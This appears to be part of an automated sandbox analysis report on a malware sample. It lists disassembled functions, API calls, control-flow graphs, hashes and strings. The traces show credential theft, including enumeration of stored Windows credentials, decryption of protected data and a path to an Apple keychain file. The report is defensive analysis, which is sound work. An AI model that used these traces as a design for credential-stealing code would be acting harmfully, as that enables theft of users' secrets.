                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                                      • API String ID: 708747863-3398334509
                                                                                                                                                                                                                                      • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                                      Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 1344430650-1740548384
                                                                                                                                                                                                                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                                      Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                      • String ID: AE$BIN
                                                                                                                                                                                                                                      • API String ID: 1668488027-3931574542
                                                                                                                                                                                                                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                      Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 767404330-0
                                                                                                                                                                                                                                      • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                      Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                                      Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                                                                                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                                      Function 00406E8F Relevance: 2.9, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00407082
                                                                                                                                                                                                                                        • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2037443186-0
                                                                                                                                                                                                                                      • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                                                                      • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                                                      Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                      • API String ID: 1963886904-3798722523
                                                                                                                                                                                                                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
